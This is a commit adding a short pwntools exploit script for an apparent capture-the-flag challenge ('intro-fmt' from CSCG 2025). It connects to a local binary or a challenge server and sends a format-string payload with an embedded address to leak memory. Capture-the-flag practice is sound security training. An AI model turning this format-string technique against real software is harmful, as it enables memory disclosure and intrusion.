dingdong
This commit is contained in:
29
cscg25/pwn/intro2/exploit.py
Normal file
29
cscg25/pwn/intro2/exploit.py
Normal file
@@ -0,0 +1,29 @@
|
||||
from pwn import *
|
||||
|
||||
# Set the context for the binary
|
||||
context.binary = './intro-fmt' # Replace with your binary's name
|
||||
|
||||
# Choose local or remote
|
||||
LOCAL = True # Change to False if connecting remotely
|
||||
|
||||
if LOCAL:
|
||||
p = process(context.binary.path)
|
||||
else:
|
||||
p = remote("39d9389ef3a77235a475377e-1024-intro-pwn-2.challenge.cscg.live", 1337, ssl=True)# Define functions for convenience
|
||||
def send_payload(payload):
|
||||
p.sendline(payload)
|
||||
|
||||
def recv_until(delim):
|
||||
return p.recvuntil(delim)
|
||||
|
||||
def interact():
|
||||
p.interactive()
|
||||
|
||||
bug_addr = 0x40406c
|
||||
|
||||
# Example interaction
|
||||
recv_until(b'What is your name?')
|
||||
payload = b"\x6c\x40\x40 %x %x %x %x %s"
|
||||
send_payload(payload)
|
||||
|
||||
interact() # Keep the shell open
|
||||
Reference in New Issue
Block a user